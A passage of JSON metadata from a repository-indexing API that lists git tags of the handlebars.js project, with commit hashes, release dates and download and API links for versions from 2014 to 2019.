/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.2/manifests"},{"name":"v4.2.2","sha":"0d5c691f36baae183349c51c47228da45278c50a","kind":"tag","published_at":"2019-10-02T20:12:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.2/manifests"},{"name":"v4.3.5","sha":"e96c1a5d86d8b2e8b152578fa37d5cdebc2964a3","kind":"tag","published_at":"2019-10-02T20:05:02.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.5/manifests"},{"name":"v4.4.1","sha":"b8e769fcb624664a6bc7114c8739c2438d46dbe9","kind":"tag","published_at":"2019-10-02T19:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"059b33057925ebda96536421cfc7c4c75e5c61e3","kind":"tag","published_at":"2019-09-29T13:29:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.4.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.4.0/manifests"},{"name":"v4.3.4","sha":"c958cc89550ca411a78fefa426b0acee80c702eb","kind":"tag","published_at":"2019-09-28T11:25:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.4/manifests"},{"name":"v4.3.3","sha":"e4738491b3e8db97aa9b4f9967f04093ceba1a1f","kind":"tag","published_at":"2019-09-27T05:46:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.3/manifests"},{"name":"v4.3.2","sha":"2357140c68d17cb4f8ab74431e8737de6b4b39b5","kind":"tag","published_at":"2019-09-26T21:58:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.2/manifests"},{"name":"v4.3.1","sha":"050cca0866b3496852d9b198141807c32e4dae81","kind":"tag","published_at":"2019-09-24T22:32:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.1/manifests"},{"name":"v4.3.0","sha":"a89081d440a9da9f3f25835f47de837907b0094a","kind":"tag","published_at":"2019-09-24T06:04:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"fff3e40402c9f9cd790984560658646a26e1c930","kind":"tag","published_at":"2019-09-20T17:40:48.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"164c7ceea4ce074f70f2fefeba81e2e551757ea6","kind":"tag","published_at":"2019-09-03T19:58:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.2.0/manifests"},{"name":"v4.1.2-0","sha":"f98c6a54256fec0b36ae1adc4c36ab5412ca3b88","kind":"tag","published_at":"2019-08-25T16:06:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2-0/manifests"},{"name":"v3.0.7","sha":"55e4d9d80d5dd834fcf53c528e7e0aa080f315a5","kind":"tag","published_at":"2019-06-30T08:53:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.7/manifests"},{"name":"v4.0.14","sha":"272362e44c66d0110a4c98c7c1d121971ce447a7","kind":"tag","published_at":"2019-04-13T14:39:19.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.14","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.14/manifests"},{"name":"v4.1.2","sha":"10b5fcf92e6f3ddcbcec93c05c00cfdbb2e8d303","kind":"tag","published_at":"2019-04-13T14:19:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"f691db546e7563e1db3437d5a72f478f9e556714","kind":"tag","published_at":"2019-03-16T21:28:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.1/manifests"},{"name":"v4.0.13","sha":"9d4fff19d438a390b4e34d0a175b2de5f196cea8","kind":"tag","published_at":"2019-02-07T10:26:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13/manifests"},{"name":"v4.1.0","sha":"7caca944b1ae64b5bc11cba67d21e4b51ba6196a","kind":"tag","published_at":"2019-02-07T09:46:32.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.1.0/manifests"},{"name":"v4.0.13-beta.0","sha":"616f8c6fdb8b4224e5ab742e0ae400cfbc74086f","kind":"tag","published_at":"2019-02-02T20:26:35.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-beta.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-beta.0/manifests"},{"name":"v4.0.13-0","sha":"0e56659f7bc9d5060bf791d58fd57c5f9a82ae17","kind":"tag","published_at":"2019-02-02T20:25:22.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.13-0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.13-0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.13-0/manifests"},{"name":"v3.0.6","sha":"5a427d2d2b7264a83ca6702fddf63a6c7ba281c4","kind":"tag","published_at":"2019-01-02T09:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"64254b604b9d7fdf76d40b9c6675326eb4bda42b","kind":"tag","published_at":"2018-12-15T13:16:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"698c8a93a4066937977503d338bcd3b90d5035ca","kind":"tag","published_at":"2018-12-15T12:55:00.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.4/manifests"},{"name":"v4.0.12","sha":"8d22e6f501dc0720fe0610bb4dab60cae18e7d20","kind":"tag","published_at":"2018-09-04T18:44:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.12/manifests"},{"name":"v4.0.11","sha":"1e954ddf3c3ec6d2318e1fadc5e03aaf065b2fbd","kind":"tag","published_at":"2017-10-17T20:52:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.11/manifests"},{"name":"v4.0.10","sha":"670ec6fafbf99986a70074a37f73d41bad60b083","kind":"tag","published_at":"2017-05-21T12:11:27.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.10/manifests"},{"name":"v4.0.9","sha":"5ec78a8c70ac674f39a8408e04d59bd40340f6fe","kind":"tag","published_at":"2017-05-21T11:39:05.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.9/manifests"},{"name":"v4.0.8","sha":"fed5818876ec325b2b48a61395fe0089bdda05e8","kind":"commit","published_at":"2017-05-02T20:55:44.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.8/manifests"},{"name":"v4.0.7","sha":"606fa55b0a2fab4b22b810a21fc9ae1fd5fd8430","kind":"tag","published_at":"2017-04-29T20:52:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.7/manifests"},{"name":"tmp-1252-backup","sha":"ee913e28bd34dc6e97f98a99f00b484195f72d6f","kind":"commit","published_at":"2017-01-02T09:13:49.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/tmp-1252-backup","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"